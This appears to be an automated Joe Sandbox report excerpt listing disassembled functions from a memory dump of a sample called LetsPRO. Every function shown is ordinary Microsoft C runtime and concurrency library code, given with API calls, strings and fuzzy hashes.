                                        • GetFullPathNameA.KERNEL32(?,?,00000000,?), ref: 6C9126AC
                                        • GetFullPathNameA.KERNEL32(?,00000000,00000000,00000000), ref: 6C927A98
                                        • GetLastError.KERNEL32 ref: 6C927A9E
                                        • __dosmaperr.LIBCMT(00000000), ref: 6C927AA5
                                        • _errno.MSVCR100 ref: 6C927ABF
                                        • calloc.MSVCR100(?,00000001), ref: 6C927AD4
                                        • _errno.MSVCR100 ref: 6C927AE5
                                        • _errno.MSVCR100 ref: 6C927AF2
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C927AFD
                                        • free.MSVCR100(00000000), ref: 6C927B0B
                                        • _errno.MSVCR100 ref: 6C927B11
                                        • free.MSVCR100(00000000), ref: 6C927B28
                                        • _getcwd.MSVCR100(?,?), ref: 6C927B39
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$FullNamePathfree$ErrorLast__dosmaperr_getcwd_invalid_parameter_noinfocalloc
                                        • String ID:
                                        • API String ID: 4002649621-0
                                        • Opcode ID: 89f0359f9032f4c2195c7bc26acac7cdc993a23ba24155529a961b6a6066c4b2
                                        • Instruction ID: 35bc4af32fad3ab74e7238f2c9051ffad4e4e054be1f5a31ab7ecf5e968d1ad9
                                        • Opcode Fuzzy Hash: 89f0359f9032f4c2195c7bc26acac7cdc993a23ba24155529a961b6a6066c4b2
                                        • Instruction Fuzzy Hash: CA21F772218249EFDB015FA4CC8099E37ADEB523ACB24042AF454EBD95DB75C98487B0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9039FD Relevance: 19.6, APIs: 13, Instructions: 93COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetFullPathNameW.KERNEL32(?,?,00000000,?), ref: 6C903A42
                                        • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000), ref: 6C927B81
                                        • GetLastError.KERNEL32 ref: 6C927B87
                                        • __dosmaperr.LIBCMT(00000000), ref: 6C927B8E
                                        • _errno.MSVCR100 ref: 6C927BAB
                                        • calloc.MSVCR100(?,00000002), ref: 6C927BC0
                                        • _errno.MSVCR100 ref: 6C927BD1
                                        • _errno.MSVCR100 ref: 6C927BDE
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C927BE9
                                        • free.MSVCR100(00000000), ref: 6C927BF7
                                        • _errno.MSVCR100 ref: 6C927BFD
                                        • free.MSVCR100(00000000), ref: 6C927C14
                                        • _wgetcwd.MSVCR100(?,?), ref: 6C927C25
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$FullNamePathfree$ErrorLast__dosmaperr_invalid_parameter_noinfo_wgetcwdcalloc
                                        • String ID:
                                        • API String ID: 3145916893-0
                                        • Opcode ID: 908edd6eddeaa817d154af5fc67788177905ad1dbf07a5b62e8b1915d8845479
                                        • Instruction ID: ebcfa7f660526ae9401aeec51c1b3ea18f48e8cb2581c5157a36c99cf4ce8018
                                        • Opcode Fuzzy Hash: 908edd6eddeaa817d154af5fc67788177905ad1dbf07a5b62e8b1915d8845479
                                        • Instruction Fuzzy Hash: 1121D172614249AFDB009EB5CC8099E36ADAB513ACF201479F950ABA94DB38CC8486A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9800FA Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 182stringCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100(?,?,00000016,?,0000002D,00000000,000000FF,?,?,?,?,?,?,?,?,000000A3), ref: 6C980117
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,00000016,?,0000002D,00000000,000000FF,?,?,?,?,?,?,?,?,000000A3), ref: 6C980121
                                        • _errno.MSVCR100(?,?,00000016,?,0000002D,00000000,000000FF,?,?,?,?,?,?,?,?,000000A3), ref: 6C980152
                                        • __shift.LIBCMT ref: 6C98017A
                                        • strcpy_s.MSVCR100(?,000000FF,e+000,?,?,?,00000016,?), ref: 6C9801CE
                                        • _memmove.LIBCMT(?,0000000C,00000003,?,00000016,?), ref: 6C980232
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,00000016,?), ref: 6C980255
                                        • __fltout2.LIBCMT ref: 6C980291
                                          • Part of subcall function 6C97FF57: ___dtold.LIBCMT ref: 6C97FF7D
                                          • Part of subcall function 6C97FF57: _$I10_OUTPUT.LIBCMT(?,?,00000016,?,?,?,6C980296,00000000,?,?,000000FF,00000016,?,?,000000A3,?), ref: 6C97FF98
                                          • Part of subcall function 6C97FF57: strcpy_s.MSVCR100(6C980296,?,?,?,?,00000016,?,?,?,6C980296,00000000,?,?,000000FF,00000016,?), ref: 6C97FFB8
                                        • _errno.MSVCR100(?,?,?,?,000000A3,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6C98029D
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,000000A3,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6C9802A4
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • __fptostr.LIBCMT ref: 6C9802EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfostrcpy_s$I10____dtold__fltout2__fptostr__invoke_watson__shift_invalid_parameter_memmove
                                        • String ID: e+000
                                        • API String ID: 2464188683-1027065040
                                        • Opcode ID: 33a2f78a568c09d514cb430d37ccfb8ee58d4980a159468e13ff445eef6cebf1
                                        • Instruction ID: 52856353cb5f23b0652cdcc1a5f3279bc96c04fd253aae5c5a1827c65038fa57
                                        • Opcode Fuzzy Hash: 33a2f78a568c09d514cb430d37ccfb8ee58d4980a159468e13ff445eef6cebf1
                                        • Instruction Fuzzy Hash: F25125316072C99FDB118F78C8806DE7BB4AF16328F1899ADE8668BA91D770DA44C750
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90E6F2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 127COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • `non-type-template-parameter, xrefs: 6C92D16F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: NameName::
                                        • String ID: `non-type-template-parameter
                                        • API String ID: 1333004437-4247534891
                                        • Opcode ID: 8e4177382a90a0cae4acce541db948e03a7a39c513abfb52af9ad26d5f6a9a50
                                        • Instruction ID: a5c28f78bdf771559d21cc7bd084ce9ad2267bf04fcb89af9ddbe6eed48a70ad
                                        • Opcode Fuzzy Hash: 8e4177382a90a0cae4acce541db948e03a7a39c513abfb52af9ad26d5f6a9a50
                                        • Instruction Fuzzy Hash: EE4119727156449FDB08CFA8C840AE97BB9EF67748F14806DD4C48BB56E730D946C790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C918679 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 109COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _getptd$MatchType
                                        • String ID: MOC$RCC$csm$csm
                                        • API String ID: 965401092-1441736206
                                        • Opcode ID: 9d7f20d049caab8e3071f69df1ae2bb5cae32c8e1f2f3ba329a33aeb3f5daaa1
                                        • Instruction ID: 6909f7391212fa8f3342aa8f01ac52a78b5ce0a13652d8a94a3dc4c9b8631e7c
                                        • Opcode Fuzzy Hash: 9d7f20d049caab8e3071f69df1ae2bb5cae32c8e1f2f3ba329a33aeb3f5daaa1
                                        • Instruction Fuzzy Hash: 1731F331A096088FEB20DF69C480BA973FCAF1034AF29491AD899C7E51C738D548DB96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90BEE6 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 95COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_catch.LIBCMT ref: 6C90BEED
                                        • _malloc_crt.MSVCR100(00000054), ref: 6C90BF4A
                                        • __ExceptionPtr::__ExceptionPtr.LIBCMT ref: 6C90BF69
                                        • _Ptr_base.LIBCMT ref: 6C90BF92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Exception$H_prolog3_catchPtr::__Ptr_base_malloc_crt
                                        • String ID: bad allocation$csm
                                        • API String ID: 458220297-2003371537
                                        • Opcode ID: 152d557ce9e6c2b65eb5dc99a418d6d888b74977786f7a5bb3a50bab086671bd
                                        • Instruction ID: efa799e6f9cd407bc79f8da310fd37b6ad20445b1c2a72e3d5ba8b77bdfaa75b
                                        • Opcode Fuzzy Hash: 152d557ce9e6c2b65eb5dc99a418d6d888b74977786f7a5bb3a50bab086671bd
                                        • Instruction Fuzzy Hash: 25316DB1E05249DECB01DFA9D5806EEFBF8AF64708F24404EE545B7B40D774CA498BA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C93BC2D Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 54libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentProcessorNumber,?,?,?,6C93BEC7), ref: 6C93BC5C
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C93BC63
                                        • GetLastError.KERNEL32(?,?,?,6C93BEC7), ref: 6C93BC6D
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,6C93BEC7), ref: 6C93BC85
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000,?,?,?,6C93BEC7), ref: 6C93BC93
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentProcessorNumberEx,?,?,?,6C93BEC7), ref: 6C93BCB7
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C93BCBE
                                        • GetLastError.KERNEL32(?,?,?,6C93BEC7), ref: 6C93BCC8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AddressErrorHandleLastModuleProc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionThrow
                                        • String ID: GetCurrentProcessorNumber$GetCurrentProcessorNumberEx$kernel32.dll
                                        • API String ID: 1995267393-690119961
                                        • Opcode ID: 72352682e35b0680599b97409c1441e3ef1afd41c1cf6b85245ff607d5f20eee
                                        • Instruction ID: 29b0334a782569ed97fe465c3d2450362279527200fe6284d3b78c1c46d2a469
                                        • Opcode Fuzzy Hash: 72352682e35b0680599b97409c1441e3ef1afd41c1cf6b85245ff607d5f20eee
                                        • Instruction Fuzzy Hash: 7C0165B1B045659BCB349BB99849A5E37BCBFD628C3106926E02AD2900DF24D404E69A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C902C06 Relevance: 18.0, APIs: 8, Strings: 2, Instructions: 486COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __forcdecpt_l_isleadbyte_l_mbtowc_l_strlen
                                        • String ID: $g
                                        • API String ID: 3157115575-3845294767
                                        • Opcode ID: 98cc41de6570cab42dad13a61f1dffe63dbef3d998d08679d917aa1031e87579
                                        • Instruction ID: a5423faca75920af25a953aed7d6819c58b359bf59f33ec7b8e99f7f77183fde
                                        • Opcode Fuzzy Hash: 98cc41de6570cab42dad13a61f1dffe63dbef3d998d08679d917aa1031e87579
                                        • Instruction Fuzzy Hash: A4226BF1A05629CADB608F288D84BD8B7B8BB45318F1482EDD718A7A41D770DAC5CF58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9408C6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 83COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6C9408F9
                                        • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 6C9408FF
                                        • DuplicateHandle.KERNEL32(00000000), ref: 6C940902
                                        • GetLastError.KERNEL32 ref: 6C94090C
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C940924
                                        • _CxxThrowException.MSVCR100(6C933918,6C9A0D0C,?), ref: 6C940932
                                        • ??2@YAPAXI@Z.MSVCR100(0000000C,6C933918,6C9A0D0C,?), ref: 6C940939
                                        • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR100(6C933918,6C9A0D0C,?), ref: 6C94094C
                                        • std::exception::exception.LIBCMT(?), ref: 6C94099E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CurrentProcess$??2@AcquireConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorConcurrency@@DuplicateErrorExceptionHandleLastLock@details@ReaderThrowWrite@_Writerstd::exception::exception
                                        • String ID: eventObject
                                        • API String ID: 1946344800-1680012138
                                        • Opcode ID: 0c5c5c5396a01bd63ac69890b32d7b40504829eba3ce5ee14c6f24a3e3d79505
                                        • Instruction ID: 67d811121fbc8f3dc570dfd082d3c2894bd0e4a32402819f80742d459f489aaf
                                        • Opcode Fuzzy Hash: 0c5c5c5396a01bd63ac69890b32d7b40504829eba3ce5ee14c6f24a3e3d79505
                                        • Instruction Fuzzy Hash: 99316172600215EFDB10CFA8C980ADABBF8FF68354B10952AE469D7B50D770E915CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90E5D0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 83COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: NameName::operator+
                                        • String ID: cli::array<$cli::pin_ptr<$void$void
                                        • API String ID: 1360548761-456688812
                                        • Opcode ID: 55943b8dd1f17d65f40effbabc66e22ecc4b0fe99b5c5483ce13df03e9a06b8f
                                        • Instruction ID: 08cdd0fed743e6ad0c8f56918ea1357ad6a36d34c16d883e26c054fa29f62ad2
                                        • Opcode Fuzzy Hash: 55943b8dd1f17d65f40effbabc66e22ecc4b0fe99b5c5483ce13df03e9a06b8f
                                        • Instruction Fuzzy Hash: A5218072A15209EFDF05CF54D840DEE3BB9EF55718F00805AE8589BB54EB34EA44CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C95EE65 Relevance: 16.7, APIs: 11, Instructions: 202COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100 ref: 6C95EE99
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C95EEA3
                                        • _strnset_s.MSVCR100(?,?,?,?,?), ref: 6C95EECC
                                        • _ismbblead_l.MSVCR100(?,?,?), ref: 6C95EF0A
                                        • _ismbblead_l.MSVCR100(?,?,?), ref: 6C95EF36
                                        • _errno.MSVCR100(?), ref: 6C95EF47
                                        • _ismbblead_l.MSVCR100(?,?,?), ref: 6C95EF81
                                        • _ismbblead_l.MSVCR100(?,?,?), ref: 6C95EFA8
                                        • _ismbblead_l.MSVCR100(?,?,?), ref: 6C95EFEB
                                        • _errno.MSVCR100(?), ref: 6C95F042
                                        • _invalid_parameter_noinfo.MSVCR100(?), ref: 6C95F04C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _ismbblead_l$_errno$_invalid_parameter_noinfo$_strnset_s
                                        • String ID:
                                        • API String ID: 1238685693-0
                                        • Opcode ID: 139f850cf3db0c2d70c5424d3f0e1f9cd43d2a4108647a5875e8606264ab0931
                                        • Instruction ID: 212c96cc8d2852df74d8374dbe15686d544184e8df9b7cc1d15284c2cc0e75ff
                                        • Opcode Fuzzy Hash: 139f850cf3db0c2d70c5424d3f0e1f9cd43d2a4108647a5875e8606264ab0931
                                        • Instruction Fuzzy Hash: 6171B37180928ADFDF10CFA4D4505EDBBB8AF0531CF98409EE8A066A41D73BC1A5CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9094BF Relevance: 16.7, APIs: 11, Instructions: 193COMMON
                                        Download Yara Rule
                                        APIs
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C9086CB
                                        • free.MSVCR100(?), ref: 6C9086D7
                                        • free.MSVCR100(?,?), ref: 6C9086E2
                                        • _calloc_crt.MSVCR100(00000001,00000050), ref: 6C9094E2
                                        • _malloc_crt.MSVCR100(00000004), ref: 6C909502
                                          • Part of subcall function 6C900B61: malloc.MSVCR100(00000001,00000001,00000001,?,6C90A9B4,00000018,6C90A988,0000000C,6C927537,00000001,00000001,?,6C901F15,0000000D), ref: 6C900B6D
                                        • _malloc_crt.MSVCR100(00000004), ref: 6C909525
                                        • free.MSVCR100(00000000), ref: 6C931701
                                        • free.MSVCR100(00000000), ref: 6C93170D
                                        • free.MSVCR100(?,00000000), ref: 6C931715
                                        • ___free_lconv_num.LIBCMT ref: 6C931724
                                          • Part of subcall function 6C9088CA: GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6C908914
                                          • Part of subcall function 6C9088CA: _calloc_crt.MSVCR100(00000000,00000002,?,?,00000000), ref: 6C908923
                                          • Part of subcall function 6C9088CA: GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6C90893C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: free$InfoLocale_calloc_crt_malloc_crt$DecrementInterlocked___free_lconv_nummalloc
                                        • String ID:
                                        • API String ID: 2828155784-0
                                        • Opcode ID: 37dc5afdd1b450eb43e97f51bd70751a74a9793d5edcb20778bd445b88eed443
                                        • Instruction ID: de56846d4b0babe35001182140542e2d2be97ab16379d16b2ab4d87ca570b58f
                                        • Opcode Fuzzy Hash: 37dc5afdd1b450eb43e97f51bd70751a74a9793d5edcb20778bd445b88eed443
                                        • Instruction Fuzzy Hash: F75100B2B05314AFDB118FA8D840B9A77FDEF09704F2508AEE955DBA80E770D9408B50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C942477 Relevance: 16.7, APIs: 11, Instructions: 153threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C94247E
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,00000000,6C93D865,00000000,?,00000000,00000000), ref: 6C9424A9
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000001,?,00000000,00000000), ref: 6C942504
                                          • Part of subcall function 6C942161: std::exception::exception.LIBCMT(6C941FF3,?,6C941FF3,00000001), ref: 6C942180
                                          • Part of subcall function 6C942161: _CxxThrowException.MSVCR100(?,6C9A0EAC,6C941FF3), ref: 6C942195
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000001,?,00000000,00000000), ref: 6C942513
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000003,00000002,00000001,?,00000000,00000000), ref: 6C942522
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6C942531
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6C942540
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000008,00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6C94254F
                                        • GetCurrentThread.KERNEL32 ref: 6C94256D
                                        • GetThreadPriority.KERNEL32(00000000), ref: 6C942574
                                        • ??2@YAPAXI@Z.MSVCR100(00000838), ref: 6C942675
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Policy$Concurrency@@ElementKey@2@@Policy@SchedulerValue@$Thread$??2@CountCriticalCurrentExceptionH_prolog3InitializePrioritySectionSpinThrowstd::exception::exception
                                        • String ID:
                                        • API String ID: 138514572-0
                                        • Opcode ID: 1129b0bbacb61b5f2f2a297c7ce9ece1801b20b351b51a3b6e80caa7a0a5ce9f
                                        • Instruction ID: fc9f26f4667647dd40205c7556665baaf39fa7ff5a804cd801668a4cdcc38feb
                                        • Opcode Fuzzy Hash: 1129b0bbacb61b5f2f2a297c7ce9ece1801b20b351b51a3b6e80caa7a0a5ce9f
                                        • Instruction Fuzzy Hash: 0061E4B1B04A02AFD708CF39C885B99FBA2BB59304F44C62ED56DC7B41DB70A5648B80
